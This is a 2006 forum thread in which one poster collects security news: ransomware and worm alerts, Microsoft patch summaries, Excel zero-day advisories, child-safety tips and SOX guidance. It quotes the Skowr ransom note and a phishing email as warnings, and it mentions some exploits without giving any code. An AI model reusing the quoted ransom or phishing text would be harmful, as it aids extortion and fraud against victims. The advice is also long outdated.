In comparison to the previous variant, GpCode.ae, which we detected last week, this new variant uses a stronger encryption algorithm (RSA 330 bit); this makes it more difficult for our virus analysts to develop decryption. However, we’ve been successful, and we added detection and decryption for infected files to our antivirus databases.Users who have been infected by GpCode.af should download the latest antivirus databases and fully scan their computers. One point that we want to stress: at the moment, we’re still not 100% sure how this virus penetrates victim computers. You should exert maximum caution: don’t launch files that you receive via email, and ensure that your operating system and browser is fully patched.
Finally, back up your data on a regular basis. Then if the worst ever does happen – and we hope it won’t – you’ll still have a copy of whatever you were working on.
-
June 6, 2006 at 1:01 pm #3164458
McAfee’s AVERT Labs – New Blog for Malware Developments
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
AVERT Labs has developed a new Blog facility to provide commentary on the latest malware developments. This will complement their good portal facilities. These sites are all good resources to bookmark.
New AVERT Labs Blog
http://www.avertlabs.com/research/blog/AVERT Labs Portal
http://myavert.avertlabs.com/myavert/default.aspxMcAfee Threat Center
http://www.mcafee.com/us/threat_center/default.asp -
June 7, 2006 at 1:02 pm #3145210
AVERT Labs Blog – Keeping Children Safe on the Internet
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Excellent Advice for both children and adults … Stay as anonymous as possible on the Internet to ensure both privacy and safety. As parents take the time to teach your children safety and responsibility while using the great resources available to us via the Internet.
McAfee AVERT Blogs – Security and Children?s Web Sites
http://www.avertlabs.com/research/blog/?p=22
QUOTE: It?s always a good time to discuss computer security issues with your children. Here?s some thoughts to start:
1) Generally, don?t talk to strangers. Unfortunately, children are not going to abide by this, as part of the fun of online games is to meet and play with other people.
2) Don?t tell anyone your real full name. A first name should be good enough.
3) Don?t tell anyone your age.
4) Don?t tell anyone where you live. For purposes of playing with new-found friends on-line, just tell them the state, or the time zone and when it would be possible to play together again.
5) To register online for games, don?t give out your birthday! As a general rule, always use January 1st. If the site has a requirement to verify the user?s age, then the year of birth could be used. But all online birthdays should be January 1st. (All horses have a birthday of January 1.)
6) Many sites now ask only for your zip code. But even there, if you?ve ever lived at a different address than you do now, use that old zip code. In fact, if the site is not going to be actually sending you anything via US Mail, use that old address for all registrations.
7) Establish an online email account for the purpose of using it as the registration email address for any online registration.
8) Establish an answer to the online ?security? questions, like ?Name of favorite pet? or ?Mother?s maiden name?. Especially for something like ?Mother?s maiden name? which is actually used for identity purposes later in life, make up an answer. If your children have a school mascot, what?s its name? And just use that same answer for all the *online game* registrations.
9) And if there?s going to be money involved, always require that a parent be involved.
-
June 8, 2006 at 9:03 am #3143519
Sabarnes Oxley Forums – Thwarting Hacker Techniques
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Below is a link to the SOX forums, where one of our SOX Guru’s (milan) shares an excellent document. Some quick lists were also shared related to controlling the two primary facets of security (e.g., the technology and the human behavorial controls), as noted below:
Sabarnes Oxley Forums – Thwarting Hacker Techniques
PART ONE — Technological defense systems
1. Keep your operating systems and all software patched (install patches expediently and use tools like WSUS, SMS, etc to roll these out in a productive fashion)
2. Use a commercial grade multi-tier Firewall system
3. Use a good commercial “best in the industry” standard AV defense system with centralized alerting and logging (e.g., corporate versions of Trend, McAfee, etc)
4. Anti-Spyware defense software
5. Intrusion Detection software
6. Network Vulnerability Assessment tools (STAT, RealSecure, KSA, Bindview, Nexus, MSBA, etc)
PART TWO — “Security is a Process”
While you can have the best technological defenses in the world, security must be emphasized to everyone as a “living & breathing” process. For example, you can have the best locks in the world on the “hen house” — but if the chickens “let the fox in”, those technological locks won’t do a bit of goodA quick list of ideas:
1. Security Awareness program – Users need to know risks, best practices, etc … Security = SEC-U-R-IT-Y (i.e., “you are it”). An awareness program can be formal classes, a monthly newsletter, internal corporate email alerts when viruses are inside the company, best practices, etc.
2. Policies, Procedures, and Standards – to help control human behavorial risks
3. Develop a comprehensive security web site on your Intranet, so it’s easily accessible and referenceable with all policies and other information to help educate the user.
4. Actively monitor the network (check IDS and Firewall alerts, Port Traffic spikes, etc)
5. Proactively monitor emerging security risks and take precautions when new threats escalate publicly.
6. Actively test your networks on a quarterly basis for exposures and conduct a more thorough annual penetration test
7. In developing new systems or solutions, design security up-front rather than making it an “after thought”
8. In granting security, employ minimalist security rights giving folks just what they need from an access perspective
9. Avoid giving users root or local admin authority on their client workstations
10. Use a continuous improvement theme when it comes to security controls.
-
June 8, 2006 at 9:03 am #3143520
Phishing Attacks – New approach for fake URLs
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Kaspersky shares a tactic where a “fake URL frame” is inserted into the HTML code and the Paypal screen is expanded to full screen mode to hide the true URL. The key way to stay protected is to never click on URLs in an email solicitation. Instead go to the legitimate site by keying the name of the site into your browser, if you wish to donate or contact someone.
-
June 9, 2006 at 9:12 am #3144316
New phpBB version 2.0.21 release contains security improvements
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
All sites using phpBB should move to the latest version to ensure the best level of security protection as well as improved functionality.
http://www.incidents.org/diary.php?storyid=1390
phpBB version 2.0.21 was released. There are some minor security improvements in the code, check the announcement for more details. Most of the code changes apear to be more functionality oriented than security oriented.
Considering the level of attention phpBB gets from the bad guys out there, it’s best not to hesitate for long and upgrade really soon.
-
June 11, 2006 at 9:11 am #3145051
MS06-015 will not provide patch for windows 98 and ME
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
As Windows 98 and ME have reached “product end-of-life”, Microsoft will no longer provide security updates. While there are a number of users who still use W/98 in particular, they should continue to employ the safest practices at all times until they can purchase a new PC.
MS06-015 will not provide patch for windows 98 and ME
http://www.incidents.org/diary.php?storyid=1394Quote: Microsoft announced that they will not provide a patch for Windows 98 and ME for MS06-015 “Vulnerability in Windows Explorer Could Allow Remote Code Execution (908531)”. The choice appears to be related to the amount of effort needed to patch the problem and the fact that those Operating systems reach the end of their lifecycle on June 11th.
-
June 11, 2006 at 9:12 am #3145050
Microsoft Security Updates – Huge "Patch Tuesday" release on 06/13/2006
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
There appears to be about a dozen patches coming on June 13th: Windows (9), Office (2), and Exchange (1). Also, non-security changes are forecast for ActiveX and Windows/MS Update controls.
Microsoft Security Updates – June 2006 Preview http://www.microsoft.com/technet/security/bulletin/advance.mspx
http://www.incidents.org/diary.php?storyid=1395 -
June 12, 2006 at 5:11 pm #3145507
Skowr – Ransomware Trojan encrypts and demands payment
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
The Skowr trojan is yet another ransomware threat that can impact users opening spam email attachments or URLs which can download malware code. Always backup important files and be careful in handling any email message.
Skowr – Ransomware Trojan encrypts and demands payment
http://secunia.com/virus_information/29779/skowr/QUOTE: Skowr is a trojan that scans the hard drive of an infected machine for certain file types, attempts to encrypts them and delete the original files. It then issues a ransom demand in an attempt to extort money from the victim, in order for them to obtain the password to recover the encrypted files.
RANSOM NOTE:
WARNING: FILE ENCRYPTION HAS BEEN FINISHED!
############################################
Dear User,
———-
Some Ascii Files have been encrypted with the sk0r alias Czybik’s Ascii File Encryption Engine v1.0. You are not longer able to use those files. But now nothing is lost. You are able to use your files again if you decrypt them. To do this you need to buy a decoder and the password. So how can you buy this? The following stepps will show you what to do:
Decryption Notes:
=================
1) Simply write an email to: ********* with subject: Need Decoder and Password
2) Wait for an email from me.
3) Read the email and follow the stepps (you must give a payment to me to get the decoder and the password
4) Open the decoder.exe
5) Input File and Password and click decrypt –> Do this for all encrypted files
Pricelist:
==========
Decoder: Game Accounts in worth of about maximum 80 ?.
Password: Game or Internet Accounts (Websites) in worth of maximum 20 ?
You see you can be lucky that the Decoder and the Password are so cheap. Be lucky you are not a victim of other Ransomware, they are very expensive (400$) So please follow the stepps. Otherwise you will not be able to use your files again. Don ‘t send to avers. They will not be able to get or crack the password. So pay or say ‘bye’ to all your encrypted files.
Regards: sk0r / Czybik – Malwarewriter
Win32.Skowor Ransomware ?2006 by sk0r / Czybik
sk0r alias Czybik’s Ascii File Encryption Engine v1.0 ?2006 by sk0r / Czybik -
June 12, 2006 at 5:11 pm #3145508
JS.Yamanner – Spreads via Yahoo’s free email facility
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Yamanner is a new JavaScript based Trojan horse that manipulates and “harvests” Yahoo email account contacts.
JS.Yamanner – Spreads via Yahoo’s free email facility
http://secunia.com/virus_information/29782/js.yamanner/
http://www.sarc.com/avcenter/venc/data/js.yamanner@m.htmlQUOTE: JS.Yamanner@m is a worm that is written in JavaScript. It exploits a vulnerability in the Yahoo email service to send a copy of itself to the user’s Yahoo email contacts.
EMAIL to AVOID:
From: Varies
Subject: New Graphic Site
Message body: Note: forwarded message attached. -
June 13, 2006 at 9:12 am #3141490
Tech Republic’s Top 10 Security Tips
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
There are a number of “Top 10s” in this list:
-
June 13, 2006 at 1:11 pm #3164799
Microsoft Security Bulletin Summary for June, 2006
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
The June updates required over 20MB of downloading to accomplish all the Windows, IE, and Office patches. There are several critical updates including a patch to Word where a zero day exploit had surfaced in the past couple of weeks.
Microsoft Security Bulletin Summary for June, 2006
http://www.microsoft.com/technet/security/bulletin/ms06-jun.mspx -
June 15, 2006 at 5:11 pm #3154933
IE/Firefox URL exploits in email impacting Australia
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
As shared by the Internet Storm Center, always avoid clicking on URLs in suspicious email messages.
E-mails with malicious links targeting Australia
http://www.incidents.org/diary.php?storyid=1417We’ve received couple of reports about e-mails being spammed which contain browser exploits. What’s interesting about this is that they are targeting Australia.
The URL contains an obfuscated JavaScript. The JavaScript code will check which browser the user is running and will redirect him to the appropriate exploit, served by a CGI script. The JavaScript will also detect if a user is running Service Pack 2, and append that information as a CGI parameter as well.
The following Internet Explorer vulnerabilities are exploited: MS03-011, MS06-006, MS06-014. And one Mozilla FireFox vulnerability is exploited as well: MFSA2005-50
For FireFox user, there is good add-on tool for preventing malicious Javascripts. The add-on tool called “NoScript”. You can find more information following site :
https://addons.mozilla.org/firefox/722/Quote: TEXT OF MALICIOUS EMAIL MESSAGE “People starting panic withdrawals, some of the accounts were reported closed due to technical reasons, many ATMs are not operating. Does it seem that one of the Australia’s greatest goes bankrupt? The full story could be found here: <URL> Well, hope that isn’t true… Anyway You’d rather check your balance…”
-
June 15, 2006 at 5:11 pm #3154934
Microsoft Security Bulletins – June 2006 more detailed information
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Below is a more detailed version of what we’re patching this month as it’s the largest security release by Microsoft in over a year … No issues so far with both my laptop and desktop XP SP2 systems at work
CRITICAL BULLETINS
MS06-021: Cumulative Security Update for Internet Explorer (916281)
http://www.microsoft.com/technet/security/bulletin/ms06-021.mspxMS06-022: Vulnerability in ART Image Rendering Could Allow Remote Code Execution (918439)
http://www.microsoft.com/technet/security/bulletin/ms06-022.mspxMS06-023: Vulnerability in Microsoft JScript Could Allow Remote Code Execution (917344)
http://www.microsoft.com/technet/security/bulletin/ms06-023.mspxMS06-024: Vulnerability in Windows Media Player Could Allow Remote Code Execution (917734)
http://www.microsoft.com/technet/security/bulletin/ms06-024.mspx
MS06-025: Vulnerability in Routing and Remote Access Could Allow Remote Code Execution (911280)
http://www.microsoft.com/technet/security/bulletin/ms06-025.mspxMS06-026: Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution (918547)
Note – only impacts W/98
http://www.microsoft.com/technet/security/bulletin/ms06-026.mspx
MS06-027: Vulnerability in Microsoft Word Could Allow Remote Code Execution (917336)
http://www.microsoft.com/technet/security/bulletin/ms06-027.mspxMS06-028: Vulnerability in Microsoft PowerPoint Could Allow Remote Code Execution (916768)
http://www.microsoft.com/technet/security/bulletin/ms06-028.mspxMODERATE BULLETINS
MS06-031: Vulnerability in RPC Mutual Authentication Could Allow Spoofing (917736)
Note – only impacts W/2000
http://www.microsoft.com/technet/security/bulletin/ms06-031.mspxIMPORTANT BULLETINS
MS06-029: Vulnerability in Microsoft Exchange Server Running Outlook Web Access Could Allow Script Injection (912442)
http://www.microsoft.com/technet/security/bulletin/ms06-029.mspxMS06-030: Vulnerability in Server Message Block Could Allow Elevation of Privilege (914389)
http://www.microsoft.com/technet/security/bulletin/ms06-030.mspxMS06-032: Vulnerability in TCP/IP Could Allow Remote Code Execution (917953)
http://www.microsoft.com/technet/security/bulletin/ms06-032.mspxINTERNET STORM CENTER – ANALYSIS OF EACH BULLETIN
Microsoft patch day
Published: 2006-06-13,
Last Updated: 2006-06-14 10:18:05 UTC by Swa Frantzen (Version: 1)Microsoft is releasing today 12 new security bulletins:- MS06-021 Cumulative patch for Internet Explorer – Critical
- MS06-022 ART image library buffer overflow – Critical
- MS06-023 Microsoft JScript memory corruption – Critical
- MS06-024 Windows media player – Critical
- MS06-025 RRAS – Critical
- MS06-026 Graphics rendering engine remote code execution – Critical
- MS06-027 Word remote code execution – Critical
- MS06-028 Powerpoint remote code execution -Critical
- MS06-029 Exchange – Important
- MS06-030 SMB privilege escalation – Important
- MS06-031 RPC mutual authentication spoofing – Moderate
- MS06-032 IP source routing allows remote code execution – Important
and re-released one:
-
June 15, 2006 at 5:11 pm #3154935
Microsoft June Security Updates – New Exploits Surfacing
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
All users should patch their systems expediently, as some of these exploits could be crafted into viruses
Microsoft June Security Updates – New Exploits Surfacing
http://www.incidents.org/diary.php?storyid=1415After yesterday’s patchday, we start to receive a number of reports about newly released exploits for vulnerabilities announced on Tuesday. Here a quick lists of what we have seen so far:
MS06-024: Windows Media Player — Exploit released by penetration testing vendor to customers.
MS06-025: RRAS — Exploit released by penetration testing vendor to customers.
MS06-027: Word remote code execution — Exploit available before release of patch.
MS06-030: SMB Priviledge Escalation — Two exploits released to the public.
MS06-032: IP Source Routing Exploit — DoS exploits released privately (trivial exploit)
-
June 16, 2006 at 1:12 pm #3268573
Mdropper.J – Zero Day Excel based Exploit
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Users should be cautious with all unusual attachments from unexpected or suspicious email, including Excel documents where a new attack has recently surfaced. Microsoft is working on this issue as noted in the MSRC blog.
Mdropper.J – Zero Day Excel based Exploit
http://blogs.technet.com/msrc/archive/2006/06/16/436174.aspx
http://secunia.com/advisories/20686/
http://www.frsirt.com/english/advisories/2006/2361Mdropper.J – Links related to New Trojan Horse
http://www.frsirt.com/english/virus/2006/04533
http://www.symantec.com/avcenter/venc/data/trojan.mdropper.j.htmlQUOTE: Here’s what we know: In order for this attack to be carried out, a user must first open a malicious Excel document that is sent as an email attachment or otherwise provided to them by an attacker. (note that opening it out of email will prompt you to be careful about opening the attachment) So remember to be very careful opening unsolicited attachments from both known and unknown sources.
Technical Description: A vulnerability has been identified in Microsoft Excel, which could be exploited by attackers to take complete control of an affected system. This flaw is due to an unspecified error when processing a specially crafted document, which could be exploited by attackers to execute arbitrary commands by convincing a user to open a malicious file.
Affected Products: Microsoft Excel 2000-2003, Office 2000-2003
Zero Day Excel based Exploit: This 0day vulnerability is currently being exploited in the wild by Trojan.Mdropper.J
-
June 16, 2006 at 1:12 pm #3268574
Windows XP SP1 support ends on October 10, 2006
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
After October 2006, Microsoft will no longer provide security updates for XP SP1. Users should move to Service Pack 2 to continue enjoying the best possible levels of security protection.
Windows XP SP1 support ends on October 10, 2006
http://support.microsoft.com/gp/lifean19Windows and SP EOL Links
http://www.microsoft.com/windows/lifecycle/default.mspx
http://www.microsoft.com/windows/lifecycle/servicepacks.mspx -
June 16, 2006 at 1:12 pm #3268575
Windows Malicious Software Removal Tool — Removing a lot of malware
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Over a year ago, Microsoft introduced a valuable service to home users and others who may be less protected than corporate users. During each “Patch Tuesday” release this tool is updated to clean some of the most prominent threats impacting Windows.
Windows Malicious Software Removal Tool — Removing a lot of malware
QUOTE: The MSRT has removed 16 million instances of malicious software from 5.7 million unique Windows computers over the past 15 months. On average, the tool removes at least one instance of malware from every 311 computers it runs on.
-
June 16, 2006 at 1:12 pm #3268576
TechNet – Excellent User Security Awareness Article
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Dr. Jesper Johansson’s article in the July 2006 edition of TechNet Magazine is EXCELLENT in highlighting the importance of security education for users as part of the “process”.
Article: Help Wanted?Need “People” People
QUOTE: Empower People — I firmly believe that writing off people is wrong. People are incredibly smart when you get right down to it. They have learned some extremely complicated things, like walking, talking, reading, even driving cars without crashing into things all that often. There is no reason to believe they could not be taught to make more intelligent security decisions. I am not saying they should become security experts; only that they need to learn that sending a blank, signed check to an unknown recipient is probably not a good idea.
-
June 19, 2006 at 7:21 am #3270567
Securiteam Blogs — FAQ on Execel 0 Day Vulnerability
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
This FAQ provides a good summary related to the new 0 Day vulnerability which is being exploited in spam email. Avoid all untrusted Excel spreadsheets found in email messages and keep you anti-virus software up-to-date until Microsoft has a security patch to address this new issue. So far, this new threat is not prevelant in the wild.
Securiteam Blogs — FAQ on Execel 0 Day Vulnerability
http://blogs.securiteam.com/index.php/archives/451Good Security Resource to Bookmark
http://www.securiteam.com/ -
June 19, 2006 at 7:21 am #3270565
Windows XP Service Pack 2 can now be ordered on CD
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Windows XP SP1 will no longer be supported by Microsoft after October 10, 2006. It is important to move to Service Pack 2 which can be downloaded from Microsoft’s web site. Dial up users can obtain the CD by ordering it from Microsoft. While the CD is free, there is a shipping & handling charge.
IT Professionals should help get their friends and family who may not be aware of this issue to this more secure version of Windows.
Order Windows XP Service Pack 2 on CD
QUOTE: Thank you for your interest in the Windows XP Service Pack 2 CD. This CD includes the same Service Pack 2 software that is available for download from Microsoft Update.
Note: A shipping and handling charge will be assessed on your order.
Share This CD with a Friend — After you have installed Service Pack 2, Microsoft encourages you to give this CD to a friend or family member using Windows XP.
-
June 19, 2006 at 7:21 am #3270566
MS06-025 Security Patch – May impact dial up scripting
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
So far, results have been good for the large number of security updates. MS06-025 may impact some users who are using older connectivity software as noted in the links below.
MS06-025 Security Patch – May impact dial up scripting
http://www.incidents.org/diary.php?storyid=1423
http://blogs.technet.com/msrc/archive/2006/06/17/436882.aspx
http://support.microsoft.com/kb/911280QUOTE: So far there?ve been no issues with a vast majority of the updates, but one issue we are tracking has to do with MS06-025, very specifically related to dial up users that use dial up scripting, a very old piece of functionality not widely in use anymore. (Users using dial up for Internet or Remote Access Services who do not use dial-up scripting or terminal windows are unaffected.
-
June 20, 2006 at 7:20 am #3269716
Sixem email virus – World Cup Soccer theme
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
It’s important to avoid all suscipious email messages as a new virus has appeared and uses the World Cup Soccer tournament as a social engineering approach.
Sixem email virus – World Cup Soccer theme
http://secunia.com/virus_information/30033/sixem.aW32.Sixem.A@mm is a mass-mailing worm that sends email messages regarding the World Cup.
-
June 20, 2006 at 7:20 am #3269717
MSIL.Kolilo – New Microsoft .NET framework virus
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
This new virus is not widespread in the wild and all .NET users should stay up-to-date on virus protection.
http://secunia.com/virus_information/30015/msil.kolilo/
MSIL.Kolilo is a polymorphic virus that infects .exe files under the Microsoft .NET Framework. This virus only executes on systems where Microsoft .NET framework is installed. The said installation is a component of the Windows operating system used to manage and provide pre-coded requirements to programs made specifically for the Windows platform.
-
June 20, 2006 at 3:18 pm #3144011
Bagle-KL: Uses Peoples Names in Subject and ZIP attachments
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
This new variant is spreading and I’ve received copies in my personal email. Avoid all ZIP attachments unless you are certain they are safe.
Bagle-KL: Uses Peoples Names in Subject and ZIP attachments
http://vil.nai.com/vil/content/v_139997.htm
http://secunia.com/virus_information/30068/bagle.fb/
http://secunia.com/virus_information/30087/bagle.fn/
http://secunia.com/virus_information/30073/bagle-km/
http://secunia.com/virus_information/30087/bagle.fn/This new variant has the following characteristics:
* contains its own SMTP engine to construct outgoing messages
* harvests email addresses from the victim machine
* the From: address of messages is spoofed
* attachment is a password-protected zip file
* password for Zip Archieve included with message
* disables security protection
* drops a rootkit -
June 20, 2006 at 7:18 pm #3143950
Second Excel vulnerability emerges today
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
A new vulnerability has surfaced with a proof-of-concept exploit. So far, there are no documented reports of this being exploited in-the-wild. Users should remain cautious with an untrusted email attachment, just in case this is spammed by email later. Microsoft is working on patches for Excel as noted in their blog entries.
Microsoft Information
http://blogs.technet.com/msrc/archive/2006/06/20/437826.aspxMicrosoft Office Long Link Buffer Overflow Vulnerability
http://secunia.com/advisories/20748/
http://www.frsirt.com/english/advisories/2006/2431QUOTE: The vulnerability is caused due to a boundary error in hlink.dll within the handling of Hyperlinks in e.g. Excel documents. This can be exploited to cause a stack-based buffer overflow by tricking a user into clicking a specially crafted Hyperlink in a malicious Excel document. The vulnerability has been confirmed in Microsoft Excel 2003 SP2 (fully updated). Other versions and Office products may also be affected.
-
June 20, 2006 at 11:18 pm #3143903
Opera 9 – New Release features security improvements
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
http://www.opera.com/index.dml
http://www.opera.com/pressreleases/en/2006/06/20/
http://www.opera.com/download/QUOTE: Opera Software today released Opera 9, its newest Web browser for PCs. You can download it free in more than 25 languages for Windows, Mac, Linux and other platforms from http://www.opera.com. Opera 9 enhances the way you access, share and use online content by including innovative widgets – fun, small and useful Web programs – and support for BitTorrent?, the popular file distribution technology. Even while adding these improvements, Opera 9 maintains the security and speed millions of Opera fans have come to expect.
Secure browsing is still the single most important attribute of any Web browser. Opera has a long track record of keeping you safe while online. By introducing the security bar to prevent scams like phishing and strengthening Opera 9’s pop-up blocker to weed out annoying or potentially malicious pop-ups, Opera gives you new options for safe browsing.
-
June 21, 2006 at 3:19 pm #3142119
Opera 9 – New Denial of Service POC vulnerability
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
I’ve been using Opera as one of my complementary browsers for a number of years. Whilte they enjoy a good security track record, a day after the release, a new proof-of-concept vulnerability has surfaced which can trigger a denial of service attack (i.e., this is a minor security risk where the browser might hang for an extraordinary length of time).
Opera 9 – New Denial of Service POC vulnerability
http://www.incidents.org/diary.php?storyid=1436QUOTE: Well, it didn’t take long. Yesterday, Opera 9 came out, today there is a proof of concept for a long href denial of service exploit. No word on when a patch will be available
-
June 21, 2006 at 7:29 pm #3269116
Rootserv – uses Kernel Mode Root Kit Techniques
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
There’s been a rash of new Bagles launched lately and one key variant can download a more potent root kit on the infected PC if the website is operational. F-Secure is reporting one new variant per day, so have the cream cheese ready …
New Bagle Variants
http://www.f-secure.com/weblog/archives/archive-062006.html#00000905
http://www.sophos.com/pressoffice/news/articles/2006/06/baglekl.html
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FBAGLE%2EFU
http://securityresponse.symantec.com/avcenter/venc/data/w32.beagle.ff@mm.htmlRootserv – uses Kernel Mode Root Kit Techniques
http://www.sarc.com/avcenter/venc/data/trojan.rootserv.htmlTrojan.Rootserv is a Trojan horse that uses kernel mode root kit technology to hide processes, files and registry entries. It also ends and prevents from running various security-related processes.
-
June 22, 2006 at 7:19 am #3268880
Insecure.org publishes Top 100 Network Security and Testing Tools
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Only trained IT professionals testing their own networks should use these tools. nmap which was purposely excluded and would be on this list as well. Each tool should be carefully assessed before using them in network penetration tests. Still it’s beneficial to test with the some of the same tools that are used by the hacker community to ensure technical defenses are in place at all points.
http://www.incidents.org/diary.php?storyid=1438
-
June 22, 2006 at 7:19 am #3268879
Mailbot.AZ – manipulates NTFS ADS and includes kernel mode root kit
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
This new threat uses advanced techniques to hide it’s presence on an infected system.
Mailbot.AZ – manipulates NTFS ADS and includes kernel mode root kit
http://www.f-secure.com/weblog/archives/archive-062006.html#00000907QUOTE: Many of our readers have probably heard of Alternate Data Streams (ADS) on NTFS. They’re not that well documented and there are only a few tools that can actually handle them. Lately we’ve been looking at variants of the Mailbot family that use hidden streams to hide themselves.
Let’s take Mailbot.AZ (aka Rustock.A) as an example. There’s only a single component lying on the disk, and that is a kernel-mode driver. It’s stored as hidden data stream attached to the system32 folder (yes, folders can have data streams as well)! Saving your data into Alternate Data Streams is usually enough to hide from many tools. However, in this case, the stream is further hidden using rootkit techniques, which makes detection and removal quite challenging. Because Mailbot.AZ is hiding something that’s not readily visible, it’s very likely that many security products will have a tough time dealing with this one.
We’ve just released a new version of our BlackLight rootkit scanner (Build 2.2.1041) that can detect current variants of Mailbot.
Mailbot.AZ is a kernel-mode rootkit that modifies the kernel to hide its presence on the compromised system. It contains an encrypted payload that will be executed in the context of a process named “services.exe”. The payload is a Spamtool with backdoor capabilities
-
June 23, 2006 at 7:35 am #3269281
MS06-025 & Excel HLINK Exploits released to public
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
FrSIRT noted developments for MS06-025 and revised their status from “Green” to “Yellow” overnight. The MS06-025 exploit impacts W/2000 users but not XP SP2 users. Hopefully, there won’t be in-the-wild attacks as they are anticipating with the exploit code publicly released
Everyone should be on the latest security patches and avoid continue to avoid untrusted Excel documents until Microsoft patches these vulnerabilities.
Microsoft Windows Exploits Out – FrSIRT CTL? Raised to Level 2
http://www.frsirt.com/english/threats/Microsoft Windows Routing and Remote Access Code Execution Issues (MS06-025)
http://www.frsirt.com/english/advisories/2006/2323Quote: Two remote code execution exploits that take advantage of vulnerabilities affecting Windows have been publicly released.
The first code targets a critical Windows Remote Access Connection Manager vulnerability (MS06-025) addressed last week. Microsoft Windows 2000 systems are primarily at risk from this exploit.
The second code exploits the recently disclosed Windows / Excel memory corruption (0day) and opens a command shell on port 4444 when a specially crafted link is clicked. Comments
FrSIRT Current Threat Level has been raised to ELEVATED (Level 2/4) … We should expect to see active exploitation of these vulnerabilities in the wild within a few hours. Published : 2006.06.22 – 11:12:55 UTC
-
June 26, 2006 at 8:33 am #3163867
Unpatched Excel Vulnerabilities – Latest news
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
The ISC has a good summary today of in-the-wild and POC exploits associated with the 3 areas of risk. These are not prevelent in the wild and staying up-to-date on AV protection will help. Most importantly, avoid all untrusted documents or URLs in email.
http://www.incidents.org/diary.php?storyid=1444
QUOTE: To help clearly identify the issues, exploit code and remedy related to the recently announce Excel vulnerabilities, I offer this humble correlation. This information comes from Microsoft, Mitre, and vigilant readers sending in tips. My thanks go to all.
CVE-2006-3059 aka “Excel Repair Mode”
http://www.microsoft.com/technet/security/advisory/921365.mspxExploited by: Mdropper.G, Booli.A, Flux.E, Booli.B
CVE-2006-3086 aka “Long Hyperlink”
http://blogs.technet.com/msrc/archive/2006/06/20/437826.aspxExploited by: Urxcel.A, and three known public exploit code examples
CVE-2006-3014 aka “Shockwave vulnerability”
Exploited by proof of concept code Flemex.A … The workaround is a killbit -
June 27, 2006 at 4:37 pm #3110927
Sarbanes-Oxley – General Recommendations on how to achieve SOX compliancy
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Below is an updated list of recommendations, shared in the Sarbanes-Oxley forums … To me, the cornerstones for success include: Planning, Training, and Commitment … Wishing all those companies who must adapt these standards, the upmost success
SOME GENERAL RECOMMENDATIONS FOR SOX IMPLEMENTATION
1. Set up a Project Plan for meeting SOX compliancy requirements (Research and explore what is needed prior to doing anything). Good planning will pay dividends for establishing this process.
2. Get training right away. The core team and especially the leader of the process should invest a week or so in training. Consider attending a formal seminar away from work where you can focus and interact with other participants. This will create a good foundation for what’s required.
3. Perform an inventory of all your IT applications. Identify all of your financial systems and look for any indirect relationships.
4. In conjunction with the inventory, examine the workflow and human factors surrounding financial processing.
5. After the inventory, perform a Risk Management study on all your financial applications (looking at possibilities that someone could either accidently or alter financial records)
6. Look at ways of strengthening the Financial process and implement new controls (e.g., versioning, change management, and security)
7. Evaluate random sampling controls and requirements for your financial applications to setup a testing/sampling program on controls each quarter or month, depending on the needs.
8. Evaluate the SOX 404 standards for best practices associated with IT control improvements. Set up a plan to implement and improve standards. Evaluate the COBIT 4.0 standards for IT controls over financial applications (note that COBIT 3.0 is the minimal acceptance level)
9. Work closely with both internal and external auditors and gain their approvals for the work that will be done.
10. Setup an e-Library (electronic documentation library) to include all your SOX documents, test plans, communications, etc.
11. Make sure you obtain senior management support for the process. It is an important aspect for implementing change. They must also support the additional work, human resources, and costs that will be needed to gain compliancy.
12. After the initial process is implemented, continue to improve the SOX controls and keep up-to-date with changes in business and legal requirements.
-
June 28, 2006 at 7:07 am #3110713
New Internet Explorer unpatched OuterHTML and HTA vulnerabilities
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
These are rated as a “moderate risk” and proof-of-concept exploits have been developed.
New IE unpatched OuterHTML and HTA vulnerabilities
http://secunia.com/advisories/20825/
http://www.incidents.org/diary.php?storyid=1448
